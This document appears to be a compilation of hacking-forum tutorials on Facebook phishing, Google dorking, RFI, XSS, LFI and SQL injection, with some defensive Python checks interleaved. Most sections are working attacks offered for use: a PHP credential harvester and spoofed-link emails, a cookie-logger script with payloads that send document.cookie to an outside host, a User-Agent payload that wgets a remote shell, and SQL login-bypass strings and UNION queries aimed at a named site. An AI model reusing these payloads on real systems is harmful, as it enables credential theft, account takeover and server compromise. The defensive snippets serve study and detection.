What is a trojan/worm/virus/logic bomb?

Trojan:
Remember the Trojan Horse? Bad guys hid inside it until they could get
into the city to do their evil deed. A trojan computer program is
similar. It is a program which does an unauthorized function, hidden
inside an authorized program. It does something other than what it
claims to do, usually something malicious (although not necessarily!),
and it is intended by the author to do whatever it does. If it's not
intentional, it's called a 'bug' or, in some cases, a feature :) Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
trojans.

Virus:
A virus is an independent program which reproduces itself. It may
attach to other programs, or it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore".

Worm:
Made famous by Robert Morris, Jr., worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems. They are
self-contained and use the networks to spread, in much the same way
viruses use files to spread. Some people say the solution to viruses
and worms is to just not have any files or networks. They are probably
correct. We would include computers.

Logic Bomb:
Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.

How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id

Now I'm gonna make a step-by-step tutorial for Facebook accounts.

WITH PICTURES!!!

ONE!:

Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". A LOT of text is gonna appear; copy it all to Notepad.

TWO!:

Now we need to change a few things in the code, so that the login button sends the info to our file instead of the Facebook login. We do that by editing the action of the code. So press Edit >> Search and search "action=" without the quotes. You should find this:

Board Image

The big red ring that circles the "action=" is what you have to change. You have to change it to 'action="next.php"'. After you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as "index.php" (not .htm!)

THREE!:

Now that we changed the action to next.php, we should also make a "next.php". Open up Notepad again and write this:

<?php
// Send the visitor straight on to the real login page.
header("Location: http://www.Facebook.com/login.php");

// Append every submitted field to the capture file, one name=value per line.
$handle = fopen("passwords.txt", "a");
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as "next.php".

Note: for security you should rename "passwords.txt" to something else.

Now make a text file called "passwords.txt", or whatever you renamed the file to in "next.php", and leave this document blank.

FOUR!:

Upload the 3 files "index.php", "next.php" and "passwords.txt" (or whatever the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! I suggest these: 110mb.com, spam.com or 007sites.com. When you have made an account you should upload the 3 files.

Congratz. You have yourself a working Phisher site!

FIVE!:

Now we would like to send spoof emails out. To do that we should first make an email account which starts with facebook@, or something that looks alike, like FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or Hotmail, or you could get a mail like "facebook@noreply.com", something like that, but eventually that would cost. When your email is set, go to step six.

SIX!:

Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DON'T SEND YET!

Remove the hyperlink from this link:

http:/www.facebook.com/n/?reqs.php

Mark it and push the Add hyperlink button.

Board Image

The Add hyperlink button is in the red circle. Now write your phisher page URL in the hyperlink bar that appears after clicking the button, and click Add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php but lead to your phisher page. That's pretty kewl. Now I believe you're ready to send your spoof emails to everybody you know, and hopefully some of them will fall for it.
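Mail-filter checks for the two tricks this post relies on: a look-alike sender such as FACEB0OK@ (step five) and link text that shows a facebook.com URL while the href leads somewhere else (step six). This is an added defender-side example, not code from the post; the sample message, the phisher.example.net host and the `legit_domains` list are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Look-alike digits commonly swapped for letters in sender names (FACEB0OK).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def _host(text):
    """Lowercase hostname of a URL-looking string, or None if it is not one."""
    text = text.strip()
    if "://" not in text:
        if not text.lower().startswith("www."):
            return None
        text = "http://" + text
    return (urlparse(text).hostname or "").lower() or None


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the message body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text)))
            self._href = None


def find_mismatched_links(html_body):
    """Return (shown_text, href) for anchors whose visible text is itself a URL
    on a different host than the one the href really points to."""
    parser = AnchorCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.anchors:
        shown, actual = _host(text), _host(href)
        if shown and actual and shown != actual:
            findings.append((text.strip(), href))
    return findings


def sender_impersonates(address, brand="facebook", legit_domains=("facebook.com",)):
    """True when the local part reads as the brand once look-alike digits are
    folded, but the domain is not one the brand owns. legit_domains is a
    demo assumption, not a vetted list of the brand's real sending domains."""
    local, _, domain = address.lower().rpartition("@")
    if not domain:
        return False
    return brand in local.translate(HOMOGLYPHS) and domain not in legit_domains


# Constructed sample modelled on step six: the anchor shows a facebook.com
# address while the href leads to the phishing host (placeholder domain).
SAMPLE_EMAIL = (
    "<p>You have a new friend request.</p>"
    '<a href="http://phisher.example.net/index.php">'
    "http://www.facebook.com/n/?reqs.php</a>"
    '<p><a href="http://www.facebook.com/help">http://www.facebook.com/help</a></p>'
)

if __name__ == "__main__":
    print(find_mismatched_links(SAMPLE_EMAIL))
    for sender in ("FACEB0OK@hotmail.com", "facebook@noreply.com", "alice@hotmail.com"):
        print(sender, sender_impersonates(sender))
```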

How to search Vulnerable site

1-) First go to http://www.google.com

2-) Press on the right, next to the textfield, on "Advanced Search".

Board Image

3-) Fill in your dork at "This exact wording or phrase".
    Results per page: 100 results (or less, depending on your internet speed.)
    Language: Could be all languages or one language. I choose Dutch because I'm Dutch myself and I've got a Dutch ISP, so those sites will load faster.
    Where your keywords show up: "in the URL of the page"

4-) Press search.

5-) Now we get this:

Board Image

6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab.

7-) Open the tabs and add, as an example, a single quote behind the link.

8-) If it's vulnerable, continue your injection; else repeat steps 5 -> 6.

Very easy (:

With this method I can find about 30 vulnerable websites in less than 2 hours and a few websites to upload a shell to.

Apple Website Hacked by HodLuM

One of the Apple sub-domains was claimed to be defaced by HodLuM, as shown above. The deface link is just an IMAGE uploaded to the Apple domain. The hacker used the word "N00BZ" for all hackers, including Anonymous, Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB. The AOL Postmaster website was also hacked by HODLUM some months before.

RFI - Remote File Inclusion.

Today I will be teaching you guys RFI (Remote File Inclusion).

What is RFI?
RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites; many users of HackForums have dorks for searching for RFI vulnerable websites, as well as lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion, is exactly what its name says: you include a file onto the website remotely.

What makes a page vulnerable?
A PHP include script looks like this.

Code:
<?php
include($_GET['p']);
?>

Since the code uses 'p', the syntax would be:
Code:
http://victimsite.com/index.php?p=URL_TO_SHELL.txt?

If the script looks like this:
Code:
<?php
include($_GET['lulz']);
?>

The syntax would then be:
Code:
http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

Understood?
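The include($_GET['p']) pattern above beside a hardened resolver, as an added example (not the post's code). It emulates the PHP decision in Python; the /srv/www/victimsite layout and the allowlist of page names are assumptions. It also rejects the null-byte suffix mentioned later in this post and the ../ traversal strings used in the LFI post further down.

```python
import os
from urllib.parse import unquote

# Constructed layout standing in for the post's example site, where
# index.php?p=interview.php includes whatever "p" names. Paths are assumptions.
WEB_ROOT = "/srv/www/victimsite"
PAGES_DIR = os.path.realpath(os.path.join(WEB_ROOT, "pages"))
ALLOWED_PAGES = {"interview", "contact", "home"}   # constructed allowlist


def resolve_include_unsafe(p):
    """Mirror of include($_GET['p']): the client-supplied string is the
    include target, so http://yoursite.com/shell.txt? is accepted verbatim."""
    return unquote(p)


def resolve_include_safe(p):
    """Map the request parameter onto a fixed set of local page files.
    Returns the absolute path to include, or None to reject the request."""
    raw = unquote(p)
    # Null bytes: the post's "shell.txt?%00" trick relied on file functions
    # truncating at NUL in old PHP; a legitimate page name never contains one.
    if "\x00" in raw:
        return None
    # Anything with a scheme (http://, ftp://, php://, data:) is a remote or
    # stream-wrapper target, never one of our pages.
    if ":" in raw:
        return None
    # Strip the ".php" the site appends itself, then allowlist the bare name.
    stem = raw[:-4] if raw.endswith(".php") else raw
    if stem not in ALLOWED_PAGES:
        return None
    # Defence in depth: the resolved file must still live under PAGES_DIR,
    # which also stops the ../../etc/passwd traversal the LFI post uses.
    target = os.path.realpath(os.path.join(PAGES_DIR, stem + ".php"))
    if os.path.commonpath([target, PAGES_DIR]) != PAGES_DIR:
        return None
    return target


if __name__ == "__main__":
    for p in ("interview.php", "http://yoursite.com/shell.txt?",
              "http://yoursite.com/shell.txt?%00", "../../../../../etc/passwd"):
        print(repr(p), "->", resolve_include_unsafe(p), "|", resolve_include_safe(p))
```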

What can I accomplish with RFI?

You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?

Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:

Exploit scanners: http://www.youtube.com/v/f6SOzynrWx4

We've got our target, how do we exploit this vulnerability?

Testing the vulnerability is basically exploiting the vulnerability, so we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making up a website for demonstration.
Code:
http://victimsite.com/index.php?p=interview.php

As you can see above, there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file, there has to be something to replace it with.

Tweaking and exploiting.

So now we want to tweak this to our advantage. This is rather simple.

What you will need.

You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.
Code:
http://yoursite.com/shell.txt

Including our shell on our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.
Code:
http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?
The question mark (?) is important. If the site was vulnerable you should now see your shell embedded in the webpage. You can then do as you wish with it.

Sometimes "shell.txt?" may not be enough; we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?", try "shell.txt?%00".


I hope this helps. Happy hacking.

XSS - Cross Site Scripting.

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting, plus how to exploit it.

What is XSS, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website, whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages, which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly, allowing us to inject strings into the source code, which then gives us the result of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as >, ", /, etc.

What types of XSS are there?

There are two types of XSS: persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website; you will only see it once. With persistent XSS you can do much more: leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?

The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.
Code:
<script>alert('XSS');</script>

We now see a pop up message on our screen saying "XSS". This is what it should look like: http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

Code:
"><script>alert('XSS');</script>

Okay, we have found out that it is vulnerable. We can now move on.

How can I deface a webpage with XSS?

I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply inject some more Javascript like we did before:
Code:
<script>window.location="http://yourdefacepage.com/index.html";</script>

Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger.

Make two files:
Cookiemonster.php
Cookies.txt

Cookiemonster.php:

Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./cookies.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert("Unicode Character '" + ch
                    + "' cannot be encoded using standard URL encoding.\n"
                    + "(URL encoding only supports 8-bit characters.)\n"
                    + "A space (+) will be substituted.");
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

<?php
}
?>

Then just leave cookies.txt blank. But make sure you made the file.

How do I send my cookie logger to my slave?

Code:
<a href="javascript:document.location='http://www.mysite.com/cookiemonster.php?cookie='+document.cookie;">Click here!</a>

Code:
<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>

What does a cookie look like?
Once you have received their cookie it should end with "PHPSESSID=52ce8e4a74936673js24500be1919004"
The cookie is the string after "PHPSESSID="
There are different forms of cookies. If you have your cookie logger setup correctly it won't matter, just copy and paste it all into your cookie editor.

What can I do with someone else's cookie?

Once you have someone else's cookie you can use a cookie editor (search for one on Google), go to the victim's website, change your cookie to theirs and you should be logged in as the user they are. Example: if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and can do as you wish.
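Defences for the two things this post exercises: escaping the reflected search term so the `<script>alert('XSS');</script>` and `"><script>...` payloads from the testing section stop being live markup, and flagging a session cookie that lacks the attributes which keep it out of document.cookie (what the cookie logger reads). Added example, not the post's code; the Set-Cookie headers are constructed around the PHPSESSID value quoted above.

```python
import html

# --- Output encoding: the search-box reflection the post tests ------------

def render_search_unsafe(term):
    """Reflect the search term the way the vulnerable page does: raw
    concatenation into an attribute value and into a text node."""
    return ('<input type="text" name="q" value="' + term + '">'
            "<p>Results for: " + term + "</p>")


def render_search_safe(term):
    """Same markup, but the term is HTML-escaped (quotes included) so it can
    neither close the value="..." attribute nor open a <script> element."""
    safe = html.escape(term, quote=True)
    return ('<input type="text" name="q" value="' + safe + '">'
            "<p>Results for: " + safe + "</p>")


def contains_live_script(page):
    """Crude oracle for the demo: does a real <script tag survive in the output?"""
    return "<script" in page.lower()


# --- Cookie attributes: what the cookie logger depends on -----------------

def audit_set_cookie(header_value):
    """Parse one Set-Cookie header value and return (cookie_name, missing),
    where missing lists the attributes a session cookie should carry.
    HttpOnly removes the cookie from document.cookie, Secure keeps it off
    plaintext HTTP, SameSite limits cross-site sends."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    missing = [a for a in ("HttpOnly", "Secure", "SameSite") if a.lower() not in attrs]
    return name, missing


# Constructed headers; the session id is the one quoted in the post.
WEAK_COOKIE = "PHPSESSID=52ce8e4a74936673js24500be1919004; path=/"
HARDENED_COOKIE = ("PHPSESSID=52ce8e4a74936673js24500be1919004; path=/; "
                   "HttpOnly; Secure; SameSite=Lax")

if __name__ == "__main__":
    for payload in ("<script>alert('XSS');</script>", "\"><script>alert('XSS');</script>"):
        print(payload,
              "unsafe:", contains_live_script(render_search_unsafe(payload)),
              "safe:", contains_live_script(render_search_safe(payload)))
    print(audit_set_cookie(WEAK_COOKIE))
    print(audit_set_cookie(HARDENED_COOKIE))
```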

Using other programming languages for XSS.

It's simple, to test if it's vulnerable try this.
Code:
<html><font color = "red">XSS</font>

If the text says XSS in red, then it's vulnerable to HTML injection as well. Just inject other languages in, and you will be able to do much more.

I hope this helps. Happy hacking.

LFI (Local File Inclusion)

1 – Introduction


In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code into proc/self/environ. It is a step-by-step tutorial.


2 – Finding LFI


- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.

Code:
www.website.com/view.php?page=contact.php

- Now let's replace contact.php with ../ so the URL will become

Code:
www.website.com/view.php?page=../

and we got an error

Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

Big chances to have a Local File Inclusion vulnerability. Let's go to the next step.

- Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:

Code:
www.website.com/view.php?page=../../../etc/passwd

we got an error and no etc/passwd file

Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

Code:
www.website.com/view.php?page=../../../../../etc/passwd

we successfully included the etc/passwd file.

Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ

Code:
www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let's inject our malicious code in proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:

Code:
www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in the User-Agent field write the following code:

Code:
<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>
{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed (it will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and will save it as shell.php in the website directory) through system(), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.

Code:
www.website.com/shell.php

Our shell is there. Injection was successful.
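The requests this post makes leave a distinct trail in the web server's access log. As an added example (not the post's code), detection logic over constructed combined-format log lines that flags directory traversal, /etc/passwd and /proc/self/environ reads, null bytes, remote URLs in a parameter (the RFI post's pattern) and PHP code planted in the User-Agent or Referer header.

```python
import re
from urllib.parse import unquote

# Apache/nginx combined log format:
#   host ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL = re.compile(r"\.\.[/\\]")                     # ../ or ..\ after decoding
SENSITIVE = ("/etc/passwd", "/proc/self/environ")       # files the post walks to
REMOTE_URL = re.compile(r"=(?:https?|ftp)://", re.I)    # RFI-style parameter value
PHP_CODE = re.compile(r"<\?|\b(?:system|exec|passthru|shell_exec)\s*\(", re.I)


def decode(value):
    """Percent-decode twice so both ..%2F and double-encoded ..%252F normalise."""
    return unquote(unquote(value))


def classify(line):
    """Return {"ip", "path", "tags"} for one log line, or None if it does not
    parse. tags is empty for ordinary traffic."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path = decode(m["path"])
    tags = []
    if TRAVERSAL.search(path):
        tags.append("traversal")
    if any(s in path for s in SENSITIVE):
        tags.append("sensitive-file")
    if "\x00" in path:
        tags.append("null-byte")
    if REMOTE_URL.search(path):
        tags.append("remote-url")
    # The post plants PHP in the User-Agent so it lands in /proc/self/environ;
    # the Referer is another header echoed there, so check both.
    if PHP_CODE.search(decode(m["ua"])) or PHP_CODE.search(decode(m["referer"])):
        tags.append("php-in-header")
    return {"ip": m["ip"], "path": m["path"], "tags": tags}


def scan(log_text):
    """Return the classified entries that carry at least one tag."""
    hits = []
    for line in log_text.splitlines():
        entry = classify(line)
        if entry and entry["tags"]:
            hits.append(entry)
    return hits


# Constructed log lines modelled on the requests in the post (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2011:13:55:41 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1800 "-" "Opera/9.80"
203.0.113.7 - - [10/Oct/2011:13:55:52 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2300 "-" "<?system('id');?>"
203.0.113.7 - - [10/Oct/2011:13:56:03 +0000] "GET /index.php?p=http://example.org/shell.txt?%00 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], ",".join(hit["tags"]))
```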

Complete SQL Injection Tutorial

Introduction:
Hello everyone.
I am going to share with you one of the best of my tutorials here.

Now let's begin!!

SQL injection (aka SQLi or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting-off point. Unfortunately most SQLi tutorials suck, so that is why I am writing this one. SQLi is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns, the columns are in tables, and the tables are in the database.
Just remember that so you understand the rest.

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp.
First we need to find a site; start by opening Google.
Now we type our dork ("definition of dork": a search entry for a certain type of site/exploit, etc.).
There is a large number of Google dorks for basic SQL injection.
Here are the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

So what we do here is in the username we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this:

username: Admin
password: 'or'1'='1
That will confuse the site and give you authorisation to enter as admin.

If the site is vulnerable then you are in :D
PART 2
Finding Sites to Inject

Finding SQLi vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks.
Download SQLI dorks list from here :

http://adf.ly/cjpJ <--- password is somewhere in it
PS: I didn't put them in the thread because I passed the count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add  '

So our link should look like that :
Press enter and you get some kind of error. The errors will vary...
Our page should look like that : (Click to Hide)
[Image: vulnerror.jpg]
After you find your vulnerable site, the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by" and a column number, and we add "--" after the number.
Our link should look like that :

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
order by 15--

If you get an error that means you should lower the number of columns.

The page opened normally; that means the number of columns is between 10 and 14.

The page opened normally too...

We got an error. That means the column count is 11, because we got an error on 12 and 11 opened normally.

Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10", replacing "order by #" with "union all select", and listing the column numbers.
Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .
Our page should look like that : (Click to Hide)
[Image: vulncolumns.jpg]

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the column numbers we can get information from. We will replace them later with something else, so write them down if you want.

Getting Database Version
We found that columns 8, 3, 4 and 5 are vulnerable, so we will use them to get the database version.
Why do we do that?
If the database is under 5 that means we will have to guess the table names.
To do that we need to replace one of the vulnerable columns by "@@version".
Let's take column 8.
Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,@@version,9,10,11--

[Image: dbversion.jpg]

In our case we got "5.0.77"; it's >5 so we can continue.

Now we need to get the table name we want to access :
